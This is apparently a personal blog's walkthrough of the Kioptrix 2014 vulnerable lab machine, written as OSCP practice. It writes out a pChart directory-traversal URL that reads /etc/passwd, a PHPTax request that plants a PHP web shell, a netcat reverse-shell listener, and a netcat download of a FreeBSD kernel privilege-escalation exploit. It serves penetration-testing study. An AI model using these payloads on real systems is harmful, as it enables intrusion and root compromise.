<!doctype html><html lang=en>
<head>
<meta charset=utf-8>
<meta name=viewport content="width=device-width,initial-scale=1">
<meta http-equiv=content-language content="en">
<meta name=color-scheme content="light dark">
<meta http-equiv=content-security-policy content="upgrade-insecure-requests; block-all-mixed-content; default-src 'self'; child-src 'self'; font-src 'self' https://fonts.gstatic.com https://cdn.jsdelivr.net/; form-action 'self'; frame-src 'self'; img-src 'self'; object-src 'none'; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/ https://cdn.jsdelivr.net/; script-src 'self' 'unsafe-inline' https://www.google-analytics.com; prefetch-src 'self'; connect-src 'self' https://www.google-analytics.com;">
<meta name=author content="Kiel Vaughn">
<meta name=description content="Kioptrix 2014 is a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.
First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.
Next I ran threader3000 to enumerate the ports and let it complete it&rsquo;s suggested nmap scan">
<meta name=keywords content="blog,cybersecurity,personal">
<meta name=twitter:card content="summary">
<meta name=twitter:title content=" Kioptrix - 2014">
<meta name=twitter:description content="Kioptrix 2014 is a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.
First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.
Next I ran threader3000 to enumerate the ports and let it complete it&rsquo;s suggested nmap scan">
<meta property="og:title" content=" Kioptrix - 2014">
<meta property="og:description" content="Kioptrix 2014 is a vulnerable machine found on the NetSecFocus Trophy Room list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.
First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used netdiscover -i eth0 until I came across the IP of this machine.
Next I ran threader3000 to enumerate the ports and let it complete it&rsquo;s suggested nmap scan">
<meta property="og:type" content="article">
<meta property="og:url" content="https://www.kielvaughn.com/ctfs/2020-08-12-kioptrix-level-2014/"><meta property="article:section" content="ctfs">
<meta property="article:published_time" content="2020-08-12T00:00:00+00:00">
<meta property="article:modified_time" content="2020-08-12T00:00:00+00:00">
<title>
Kioptrix - 2014 · Kiel Vaughn, CISSP
</title>
<link rel=canonical href=https://www.kielvaughn.com/ctfs/2020-08-12-kioptrix-level-2014/>
<link rel=preload href="/fonts/forkawesome-webfont.woff2?v=1.2.0" as=font type=font/woff2 crossorigin>
<link rel=stylesheet href=/css/coder.min.708686f8ab8176e91d44fcbe488a0fe0333b94f405cf18a52383d67ba22f0ccb.css integrity="sha256-cIaG+KuBdukdRPy+SIoP4DM7lPQFzxilI4PWe6IvDMs=" crossorigin=anonymous media=screen>
<link rel=stylesheet href=/css/coder-dark.min.aa883b9ce35a8ff4a2a5008619005175e842bb18a8a9f9cc2bbcf44dab2d91fa.css integrity="sha256-qog7nONaj/SipQCGGQBRdehCuxioqfnMK7z0Tastkfo=" crossorigin=anonymous media=screen>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=32x32>
<link rel=icon type=image/png href=/assets/img/cissp.ico sizes=16x16>
<link rel=apple-touch-icon href=/assets/img/cissp.ico>
<link rel=apple-touch-icon sizes=180x180 href=/assets/img/cissp.ico>
<meta name=generator content="Hugo 0.91.2">
</head>
<body class="preload-transitions colorscheme-dark">
<main class=wrapper>
<nav class=navigation>
<section class=container>
<a class=navigation-title href=/>
Kiel Vaughn, CISSP
</a>
<input type=checkbox id=menu-toggle>
<label class="menu-button float-right" for=menu-toggle>
<i class="fa fa-bars fa-fw" aria-hidden=true></i>
</label>
<ul class=navigation-list>
<li class=navigation-item>
<a class=navigation-link href=/whoami/>whoami</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/certifications/>certifications</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/posts/>blog</a>
</li>
<li class=navigation-item>
<a class=navigation-link href=/ctfs/>vulnerable machine walkthroughs</a>
</li>
</ul>
</section>
</nav>
<div class=content>
<section class="container post">
<article>
<header>
<div class=post-title>
<h1 class=title>
<a class=title-link href=https://www.kielvaughn.com/ctfs/2020-08-12-kioptrix-level-2014/>
Kioptrix - 2014
</a>
</h1>
</div>
<div class=post-meta>
<div class=date>
<span class=posted-on>
<i class="fa fa-calendar" aria-hidden=true></i>
<time datetime=2020-08-12T00:00:00Z>
August 12, 2020
</time>
</span>
<span class=reading-time>
<i class="fa fa-clock-o" aria-hidden=true></i>
4-minute read
</span>
</div>
<div class=tags>
<i class="fa fa-tag" aria-hidden=true></i>
<span class=tag>
<a href=/tags/oscp/>OSCP</a>
</span>
<span class=separator>•</span>
<span class=tag>
<a href=/tags/pchart-2.1.3/>pChart 2.1.3</a>
</span>
<span class=separator>•</span>
<span class=tag>
<a href=/tags/phptax/>PHPTax</a>
</span>
<span class=separator>•</span>
<span class=tag>
<a href=/tags/freebsd-9.0-kernel-exploit/>FreeBSD 9.0 kernel exploit</a>
</span></div>
</div>
</header>
<div>
<p><a href=https://www.vulnhub.com/entry/kioptrix-2014-5,62/>Kioptrix</a> 2014 is a vulnerable machine found on the <a href="https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=0">NetSecFocus Trophy Room</a> list which I have been using as preparation for the OSCP. Below is a walkthrough to compromise this machine.</p>
<p>First, after downloading and importing the machine into VMware, I had to figure out the IP address of the machine. I used <strong>netdiscover -i eth0</strong> until I came across the IP of this machine.</p>
<p><img src=/assets/img/KioptrixLevel20141.png alt="Kioptrix 2014 netdiscover"></p>
<p>Next I ran <strong>threader3000</strong> to enumerate the ports and let it complete it&rsquo;s suggested nmap scan</p>
<p><img src=/assets/img/KioptrixLevel20142.png alt="Kioptrix 2014 threader3000 nmap"></p>
<p>It appears we have two websites open on ports 80 and 8080, let&rsquo;s take a look at both. Let&rsquo;s start with the one on port 80 first.</p>
<p><img src=/assets/img/KioptrixLevel20143.png alt="Kioptrix 2014 port 80 website"></p>
<p>This appears to just be the default Apache webpage on older versions of Apache. Let&rsquo;s look at port 8080 next.</p>
<p><img src=/assets/img/KioptrixLevel20144.png alt="Kioptrix 2014 Port 8080 website"></p>
<p>I attempted to enumerate the site and gobuster was receiving a numerous amount of errors due to too many requests to both websites, so I decided to look at the source code of the sites, starting with the site on port 80 first. This is where I came across a comment that pointed to a potential directory.</p>
<p><img src=/assets/img/KioptrixLevel20145.png alt="Kioptrix 2014 port 80 source code"></p>
<p>I navigated to <strong>/pChart2.1.3/index.php</strong> and the page below appeared.</p>
<p><img src=/assets/img/KioptrixLevel20146.png alt="Kioptrix 2014 pChart 2.1.3"></p>
<p>This looked like it rendered various chart types. A quick search for pChart 2.1.3 exploits led me to this article on <a href=https://www.exploit-db.com/exploits/31173>exploit-db</a>. After reviewing the exploit, it appears that we can use it to display data in a file. Let&rsquo;s <strong>runhttp://[machine ip]/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd</strong> and see what happens.</p>
<p><img src=/assets/img/KioptrixLevel20147.png alt="Kioptrix 2014 /etc/passwd"></p>
<p>We are able to view /etc/passwd and uncover that this is running FreeBSD. We know we were not able to get into the website on port 8080, so let&rsquo;s view the apache.conf file with this exploit. A quick Google search turns up <a href=https://www.freebsd.org/doc/handbook/network-apache.html>this</a> documentation from the FreeBSD website - Apache&rsquo;s default configuration file is found at <strong>/usr/local/etc/apache2x/httpd.conf</strong>, where the x is the version number. With the version in nmap listed as 2.2 earlier, I entered the following <strong>http://[[machine ip]]/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2fusr/local/etc/apache22/httpd.conf</strong>. This pulled up the main Apache configuration file as shown below:</p>
<p><img src=/assets/img/KioptrixLevel20148.png alt="Kioptrix 2014 Apache configuration"></p>
<p>At the bottom of the configuration file is the configuration for the website on port 8080. It appears we can access it using a <strong>Mozilla4 browser</strong> user agent.</p>
<p><img src=/assets/img/KioptrixLevel20149.png alt="Kioptrix 2014 Apache Configuration User Agent"></p>
<p>Next, I installed <a href=https://addons.mozilla.org/en-US/firefox/addon/user-agent-string-switcher/>User-Agent Switcher and Manager</a> in Firefox which allows you to switch user agents. I then switched my user agent to <strong>Mozilla/4.0</strong> and clicked on <strong>Apply</strong> (active window).</p>
<p><img src=/assets/img/KioptrixLevel201410.png alt="Kioptrix 2014 User Agent"></p>
<p>Next, I navigated to <strong>http://[machine ip]:8080</strong> and I was now able to access this directory. It contains a folder named <strong>phptax</strong></p>
<p><img src=/assets/img/KioptrixLevel201411.png alt="Kioptrix 2014 port 8080 website"></p>
<p>Let&rsquo;s take a look at this site. It appears it is some sort of tax preparation software.</p>
<p><img src=/assets/img/KioptrixLevel201412.png alt="Kioptrix 2014 PHPTax"></p>
<p>Let&rsquo;s see if there are any known exploits for this software. I ran <strong>searchsploit phptax</strong> from my attacker PC and 3 results came up.</p>
<p><img src=/assets/img/KioptrixLevel201413.png alt="Kioptrix 2014 searchsploit"></p>
<p>I tried all 3 of these exploits and unfortunately was not able to get any of them to work. However, I took a look at the source code of these 3 exploits (this can be done with searchsploit -x [exploit #]). When I ran <strong>searchsploit -x 25849</strong>, I noticed something interesting even though it did not work when I ran it normally.</p>
<p><img src=/assets/img/KioptrixLevel201414.png alt="Kioptrix 2014 25849 exploit"></p>
<p>It appears that this creates a php file named <strong>rce.php</strong>. I ran this by typing in <strong>http://[machine ip]:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E";</strong> I didn&rsquo;t get any errors, but I wasn&rsquo;t sure where it saved rce.php to. Poking around it appears that by looking at the <strong>view</strong> portions of the images shows a <strong>/data/pdf</strong> directory I navigated there and it looks like there was some cleanup that hadn&rsquo;t been done from testing on this box initially.</p>
<p><img src=/assets/img/KioptrixLevel201415.png alt="Kioptrix 2014 /phptax/data/pdf directory"></p>
<p>unfortunately, rce.php was not here. I moved up to the parent directory. There it is!</p>
<p><img src=/assets/img/KioptrixLevel201416.png alt="Kioptrix 2014 rce.php location"></p>
<p>Let&rsquo;s run <strong>http://[machine ip]:8080/phptax/data/rce.php?cmd=id</strong> and see what happens.</p>
<p><img src=/assets/img/KioptrixLevel201417.png alt="Kioptrix 2014 command injection"></p>
<p>Great, now we can perform command injection. Let&rsquo;s open up a netcat listener on our attacker pc with <strong>nc -nvlp 4444</strong>.</p>
<p><img src=/assets/img/KioptrixLevel201418.png alt="Kioptrix 2014 nc listener"></p>
<p>I tried various <a href=http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>reverse shells</a>, and the Perl one worked (after I <a href=https://www.urlencoder.org/>url encoded</a> it). Once encoded, paste this command after the <strong>rce.php?cmd=</strong> portion and press enter. You should now have a reverse shell.</p>
<p><img src=/assets/img/KioptrixLevel201419.png alt="Kioptrix 2014 reverse shell"></p>
<p>Let&rsquo;s run <strong>uname -a</strong>, we can see this is running FreeBSD 9.0</p>
<p><img src=/assets/img/KioptrixLevel201420.png alt="Kioptrix 2014 uname -a"></p>
<p>In another tab on our attacker pc, let&rsquo;s run <strong>searchsploit FreeBSD 9.0</strong>.</p>
<p><img src=/assets/img/KioptrixLevel201421.png alt="Kioptrix 2014 searchsploit freebsd 9.0"></p>
<p>Let&rsquo;s copy the first one listed to our current folder with <strong>searchsploit -m 28718</strong>.</p>
<p><img src=/assets/img/KioptrixLevel201422.png alt="Kioptrix 2014 28718.c"></p>
<p>Let&rsquo;s go back to our foothold on the victim computer and see if gcc is present to compile this program.</p>
<p><img src=/assets/img/KioptrixLevel201423.png alt="Kioptrix 2014 which gcc"></p>
<p>It is present on our victim. Now we need to get the exploit over to the victim computer. Unfortunately, wget is not installed. Fortunately, we can copy this over with netcat, which is present on our victim computer.</p>
<p><img src=/assets/img/KioptrixLevel201424.png alt="Kioptrix 2014 wget nc"></p>
<p>On our <strong>attacker</strong> pc, let&rsquo;s run <strong>nc -lp 4567 &lt; 28718.c</strong></p>
<p><img src=/assets/img/KioptrixLevel201425.png alt="Kioptrix 2014 nc send file"></p>
<p>Next, on our <strong>victim</strong> pc, let&rsquo;s run <strong>nc [attacker ip] 4567 > 28718.c</strong>.</p>
<p><img src=/assets/img/KioptrixLevel201426.png alt="Kioptrix 2014 nc receive file"></p>
<p>After a few seconds, terminate netcat on the attacker pc with CTRL+C. Go back to the attacker pc and run <strong>gcc -o 28718 28718.c</strong></p>
<p><img src=/assets/img/KioptrixLevel201427.png alt="Kioptrix 2014 gcc compile"></p>
<p>Now, run the exploit with <strong>./28718</strong> and run <strong>whoami</strong>. We are now root!</p>
<p><img src=/assets/img/KioptrixLevel201428.png alt="Kioptrix 2014 run exploit"></p>
<p>Now, let&rsquo;s run <strong>cd /root</strong> and <strong>ls -al</strong>. You will see a congrats.txt file in there, so run <strong>cat congrats.txt</strong> to finish this box!</p>
<p><img src=/assets/img/KioptrixLevel201429.png alt="Kioptrix 2014 root access"></p>
</div>
<footer>
</footer>
</article>
</section>
</div>
<footer class=footer>
<section class=container>
©
2020 -
2022
Kiel Vaughn
</section>
</footer>
</main>
<script src=/js/coder.min.03b17769f4f91ae35667e1f2a1ca8c16f50562576cf90ff32b3179926914daa5.js integrity="sha256-A7F3afT5GuNWZ+HyocqMFvUFYlds+Q/zKzF5kmkU2qU="></script>
</body>
</html>